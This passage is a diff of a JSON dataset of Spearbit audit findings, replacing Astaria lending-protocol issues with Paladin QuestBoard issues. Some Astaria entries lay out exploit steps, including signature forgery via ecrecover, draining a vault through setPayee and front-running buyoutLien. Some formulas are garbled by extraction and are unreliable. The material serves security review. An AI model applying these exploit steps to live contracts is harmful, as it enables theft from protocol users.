seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into. 
And the caller/user is supposed to only call into here from VaultImplementa- tion.buyoutLien.", + "title": "Updating QuestBoard in MultiMerkleDistributor.sol will not work", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the collateral s.auctionData is not populated and thus, function gets called since stack.length is 0, this loop will not run and no payment is sent to the lending vaults. The rest of the payment is sent to the borrower. And the collateral token and its related data gets burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: Liens are continued. Collateral state hash is unchanged. liquidator isn't set. Vaults aren't updated. Withdraw proxies aren't set, etc. Related issue 88.", + "title": "Old quests can be extended via increaseQuestDuration()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... 
}", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "Phony signatures can be used to forge any strategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) 11 This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done. The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated.", + "title": "Accidental call of addQuest could block contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The addQuest() function uses an onlyAllowed access control modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), \"QuestBoard: Fail add to Distributor\"); ... ,! 
} 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), \"MultiMerkle: Quest already listed\"); require(token != address(0), \"MultiMerkle: Incorrect reward token\"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When we commit to a new lien, the following gets checked to be true for all j 2 0, (cid:1) (cid:1) (cid:1) , n (cid:0) 1: onew + on(cid:0)1 + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj where: parameter description oi onew n Li L0 k k A0 k _getOwed(newStack[i], newStack[i].point.end) _getOwed(newSlot, newSlot.point.end) stack.length newStack[i].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk params.position params.encumber.amount 12 so in a stack in general we should have the: But when an old lien is replaced with a new one, we only perform the following checks for L0 k : (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj 0 0 0 k ^ L k (cid:21) A L k > 0 And thus we can introduce: L0 o0 k (cid:28) Lk or k (cid:29) ok (by pushing the lien duration) which would break the inequality regarding oi s and Li . If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction.", + "title": "Reduce impact of emergencyUpdatequestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: Someone who has already claimed might be able to claim again. Someone who has already claimed has too much. Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. 
Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber. Let's define the following variables: parameter value i kj tj ej e0 i lj l 0 i rj r 0 i c params.position params.encumber.stack[j].point.position params.encumber.stack[j].point.last params.encumber.stack[j].point.end tnow + D0 i params.encumber.stack[j].point.lienId i )) where h is the keccak256 of the encoding i , r 0 i , c0 i , S0 i , D0 i , V 0 i , (A0max h(N 0 i , P 0 i , L0 params.encumber.stack[j].lien.details.rate : old rate params.encumber.lien.details.rate : new rate params.encumber.collateralId 13 parameter value cj c0 i Aj A0 i Amax j A0max i R Nj N 0 i Vj V 0 i Sj S0 i Dj D0 i Pj P0 i Lj L0 i Imin Dmin tnow bi o oj n params.encumber.stack[j].lien.collateralId params.encumber.lien.collateralId params.encumber.stack[j].point.amount params.encumber.amount params.encumber.stack[j].lien.details.maxAmount params.encumber.lien.details.maxAmount params.encumber.receiver params.encumber.stack[j].lien.token params.encumber.lien.token params.encumber.stack[j].lien.vault params.encumber.lien.vault params.encumber.stack[j].lien.strategyRoot params.encumber.lien.strategyRoot params.encumber.stack[j].lien.details.duration params.encumber.lien.details.duration params.encumber.stack[j].lien.details.maxPotentialDebt params.encumber.lien.details.maxPotentialDebt params.encumber.stack[j].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk AstariaRouter.s.minInterestBPS AstariaRouter.s.minDurationIncrease block.timestamp buyout _getOwed(params.encumber.stack[params.position], block.timestamp) _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end) params.encumber.stack.length O = o0 + o1 + (cid:1) (cid:1) (cid:1) + on(cid:0)1 _getMaxPotentialDebtForCollateral(params.encumber.stack) sj s0 i params.encumber.stack[j] newStack Let's go over the checks and modifications that buyoutLien does: 1. validateStack is called to make sure that the hash of params.encumber.stack matches with s.collateralStateHash value of c. This is not important and can be bypassed by the exploit even after the fix for Issue 106. 2. _createLien is called next which does the following checks: 2.1. c is not up for auction. 2.2. We haven't reached max number of liens, currently set to 5. 2.3. L0 > 0 2.4. If params.encumber.stack is not empty then c0 i , (A0max i , L0 i )) where h is the hashing mechanism of encoding and then taking the keccak256. 2.6 The new stack slot and i = c0 2.5. We _mint a new lien for R with id equal to h(N 0 i and L0 i (cid:21) A0 i , V 0 i , D0 i , S0 i , P 0 i , c0 , r 0 i i 14 the new lien id is returned. 3. isValidRefinance is called which performs the following checks: 3.1. checks c0 i = c0 3.2. checks either or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i i (cid:20) ri ) ^ (e0 (r 0 is in auction by checking s.collateralStateHash's value. i (cid:21) ei + Dmin) 4. 
check where c0 i 5. check O (cid:20) P0 i . 6. check A0max (cid:21) o. 7. send wETH through TRANSFER_PROXY from msg.sender to payee of li with the amount of bi . 8. if payee of li is a public vault, do some book keeping by calling handleBuyoutLien. 9. call _replaceStackAtPositionWithNewLien to: 9.1. replace si with s0 9.2. _burn li . 9.3. delete s.lienMeta of li . i in params.encumber.stack. So in a nutshell the important checks are: c, ci are not in auction (not important for the exploit) c0 i = c0 i and L0 n is less than or equal to max number of allowed liens ( 5 currently) (not important for the exploit) L0 i (cid:21) A0 O (cid:20) P0 i A0max i > 0 (cid:21) o i or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i (cid:20) ri ) ^ (e0 (r 0 i (cid:21) ei + Dmin) Exploit An attacker can DoS the VaultImplementation.buyoutLien as follows: 1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment and some- one on behalf of the vault calls VaultImplementation.buyoutLien which if executed would call LienTo- ken.buyoutLien with the following parameters: 15 LienActionBuyout({ incoming: incomingTerms, position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: recipient(), lien: ROUTER().validateCommitment({ commitment: incomingTerms, timeToSecondEpochEnd: _timeToSecondEndIfPublic() }), stack: stack }) }) 2. The attacker fronrun the call from step 1. and instead provide the following modified parameters to LienTo- ken.buyoutLien LienActionBuyout({ incoming: incomingTerms, // not important, since it is not used and can be zeroed-out to save tx gas position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: msg.sender, // address of the attacker lien: ILienToken.Lien({ // note that the lien here would have the same fields as the original message by the vault rep. ,! token: address(s.WETH), vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term strategyRoot: incomingTerms.lienRequest.merkle.root, collateralId: collateralId, details: details // see below }), stack: stack }) }) Where details provided by the attacker can be calculated by using the below snippet: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( s.strategyValidators[nlrType] ).validateAndParse( commitment.lienRequest, s.COLLATERAL_TOKEN.ownerOf( commitment.tokenContract.computeId(commitment.tokenId) ), commitment.tokenContract, commitment.tokenId ); The result is that: The newLienId that was supposed to be _minted for the recipient() of the vault, gets minted for the at- tacker. The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receives the interests it had anticipated. When there is a payment or Seaport auction settlement, the attacker would receive the funds instead. 16 The attacker can intorduces a malicous contract into the protocol ken.ownerOf(newLienId) without needing to register for a vault. that would be LienTo- To execute this attack, the attacker would need to spend the buyout amount of assets. Also the attacker does not necessarily need to front run a transaction to buyout a lien. 
They can pick their own hand-crafted parameters that would satisfy the conditions in the analysis above to introduce themselves in the protocol.", + "title": "Verify the correct merkle tree is used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien if the payee is a public vault by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault.", + "title": "Prevent mixing rewards from different quests and periods", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree are equal to the rewards allocated for that quest and for that period. This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will give problems later on, when claims are done for the other quest/periods. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When setPayee() is called, the payment for the lien is no longer expected to go to the vault. How- ever, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAs- sets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount: Create a lien from the vault. SetPayee to a non-vault address. Buyout the lien from another vault (this will cause the other vault's y-int and slope to increase, but will not impact the y-int and slope of the original vault because it'll fail the check on L165 that payee is a public vault. Repeat the process again going the other way, and repeat the full cycle until both vault's have desired totalAssets(). For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is pro- cessed. 
The result is that the withdrawal shares will by multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault.", + "title": "Nonexistent zero address check for newQuestBoard in updateQuestManager function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Nonexistent zero address check for newQuestBoard in updateQuestManager function. Assigning newQuestBoard to a zero address may cause unintended behavior.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "settleAuction() doesn't check if the auction was successful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken as described in Issue 93. Another potential issue is if the Seaport orders can be \"Restricted\" in future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when SeaPort tries to call back on the zone to validate it would fail.", + "title": "Verify period is always a multiple of week", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The calculations with period assume that period is a multiple of WEEK. However, period is often assigned as a parameter and not verified if it is a multiple of WEEK. This calculation may cause unexpected results. Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified: - int256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; + int256 nextPeriod = period + WEEK; The following function does not explicitly verify that period is a multiple of WEEK. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; ... } function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... } function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... } ,! function claim(..., uint256 period, ...) public { ... } function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external { ,! ... // also uses period as part of the claims array require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, \"MultiMerkle: not updated yet\"); require(!isClaimed(questID, claims[i].period, claims[i].index), \"MultiMerkle: already claimed\"); ... require( MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], ,! node), \"MultiMerkle: Invalid proof\" ); ... _setClaimed(questID, claims[i].period, claims[i].index); ... 
emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account); ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk QuestBoard.sol#L201-L203, QuestBoard.sol#L750-L815," ] }, { - "title": "Incorrect auction end validation in liquidatorNFTClaim()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "liquidatorNFTClaim() does the following check to recognize that Seaport auction has ended: if (block.timestamp < params.endTime) { //auction hasn't ended yet revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } Here, params is completely controlled by users and hence to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport which also sets liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to liquidator by setting params.endTime < block.timestamp.", + "title": "Missing safety check to ensure array length does not underflow and revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several functions use questPeriods[questID][questPeriods[questID].length - 1]. The sec- ond value in the questPeriods mapping is questPeriods[questID].length - 1. It is possible for this function to revert if the case arises where questPeriods[questID].length is 0. Looking at the code this is not likely to occur but it is a valid safety check that covers possible strange edge cases. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestObjective(... ) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Typed structured data hash used for signing commitments is calculated incorrectly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Since STRATEGY_TYPEHASH == keccak256(\"StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)\") The hash calculated in _encodeStrategyData is incorrect according to EIP-712. s.strategistNonce is of type uint32 and the nonce type used in the type hash is uint256. Also the struct name used in the typehash collides with StrategyDetails struct name defined as: 19 struct StrategyDetails { uint8 version; uint256 deadline; address vault; }", + "title": "Prevent dual entry point tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function recoverERC20() in contract QuestBoard.sol only allows the retrieval of non whitelisted tokens. Recently an issue has been found to circumvent these checks, with so called dual entry point tokens. 
See a description here: compound-tusd-integration-issue-retrospective function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } 13", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "makePayment doesn't properly update stack, so most payments don't pay off debt", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As we loop through individual payment in _makePayment, each is called with: (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iterate, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them.", + "title": "Limit the creation of quests", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function getQuestIdsForPeriod() could run out of gas if someone creates an enormous amount of quests. See also: what-is-the-array-size-limit-of-a-returned-array. Note: If this were to happen, the QuestIds can also be retrieved directly from the getter of questsByPeriod(). Note: closeQuestPeriod() has the same problem, but closePartOfQuestPeriod() is a workaround for this. Requiring a minimal amount of tokens to create a quest can limit the number of quests. The minimum number of tokens to pay is: duration * minObjective * minRewardPerVotePerToken[]. The values of duration and minObjective are least 1, but minRewardPerVotePerToken[] could be 0 and even if minRewardPerVotePerToken is non zero but still low, the number of tokes required is neglectable when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests. 14 function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { return questsByPeriod[period]; // could run out of gas } function createQuest(...) { ... require(duration > 0, \"QuestBoard: Incorrect duration\"); require(objective >= minObjective, \"QuestBoard: Objective too low\"); ... require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], \"QuestBoard: RewardPerVote too low\"); ... vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0 require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, \"QuestBoard: feeAmount incorrect\"); // feeAmount can be 0 ... require((vars.rewardPerPeriod * duration) == totalRewardAmount, \"QuestBoard: totalRewardAmount incorrect\"); ... IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount); ... ,! ,! ,! ,! } constructor(address _gaugeController, address _chest){ ... minObjective = 1000 * UNIT; // initial value, but can be overwritten ... 
} function updateMinObjective(uint256 newMinObjective) external onlyOwner { require(newMinObjective > 0, \"QuestBoard: Null value\"); // perhaps set higher minObjective = newMinObjective; } function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // geen isAlive??? ... minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required ... ,! }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "_removeStackPosition() always reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "removeStackPosition() always reverts since it calls stack array for an index beyond its length: for (i; i < length; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } Notice that for i==length-1, stack[length] is called. This reverts since length is the length of stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements ap- pearing after this index. However, an addition increment to the loop index i results in newStack[position] being empty, and the shift of other elements doesn't happen.", + "title": "Non existing states are considered active", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "periods- if a state is checked of a non existing However, ByQuest[questIDs[i]][period] is active. questIDs[i] or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. closePartOfQuestPeriod() function verifies state the of if As PeriodState.ACTIVE ==0, the stated is considered to be active and the require() doesnt trigger and pro- cessing continues. Luckily as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects. enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0 function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive ,! onlyAllowed nonReentrant { ... for(uint256 i = 0; i < length;){ ... require( periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE, // doesn't work ,! if questIDs[i] & period are empty \"QuestBoard: Period already closed\" );", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Refactor _paymentAH()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_paymentAH() has several vulnerabilities: stack is a memory parameter. So all the updates made to stack are not applied back to the corresponding storage variable. No need to update stack[position] as it's deleted later. decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also decreaseEp- ochLienCount() expects epoch, but end is passed instead. This if/else block can be merged. 
updateAfterLiquidationPayment() expects msg.sender to be LIEN_- TOKEN, so this should work.", + "title": "Critical changes should use two-step process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The QuestBoard.sol, QuestTreasureChest.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelins Ownable contract which enables the onlyOwner role to transfer ownership to another address. Its possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is neccesary for several methods.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "processEpoch() needs to be called regularly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If the processEpoch() endpoint does not get called regularly (especially close to the epoch bound- aries), the updated currentEpoch would lag behind the actual expected value and this will introduce arithmetic errors in formulas regarding epochs and timestamps.", + "title": "Prevent accidental call of emergencyUpdatequestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isnt push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retreive all the closed periods. function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) { ... questClosedPeriods[questID].push(period); ... questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) { ... // no push() questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Can create lien for collateral while at auction by passing spoofed data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the createLien function, we check that the collateral isn't currently at auction before giving a lien with the following check: if ( s.collateralStateHash[params.collateralId] == bytes32(\"ACTIVE_AUCTION\") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } However, collateralId is passed in multiple places in the params: params.encumber.lien. both in params directly and in 23 The params.encumber.lien.collateralId is used everywhere else, and is the final value that is used. But the check is performed on params.collateralId. As a result, we can set the following: params.encumber.lien.collateralId: collateral that is at auction. params.collateralId: collateral not at auction. This will allow us to pass this validation while using the collateral at auction for the lien.", + "title": "Usage of deprecated safeApprove", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin safeApprove implementation is deprecated. Reference. 
Using this deprecated func- tion can lead to unintended reverts and potential locking of funds. SafeERC20.safeApprove() Insecure Behaviour.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "stateHash isn't updated by buyoutLien function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state.", + "title": "questID on the NewQuest event should be indexed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The NewQuest event currently does not have questID set to indexed which goes against the pattern set by the other events in the contract where questID is actually indexed.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorN- FTClaim does not clear the related data on LienToken's side and also for payees that are public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If/when a liquidation auction ends without being fulfilled/matched on Seaport and afterward when the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and also the lien token does not get burnt. That means: s.collateralStateHash[collateralId] stays equal to bytes32(\"ACTIVE_AUCTION\"). 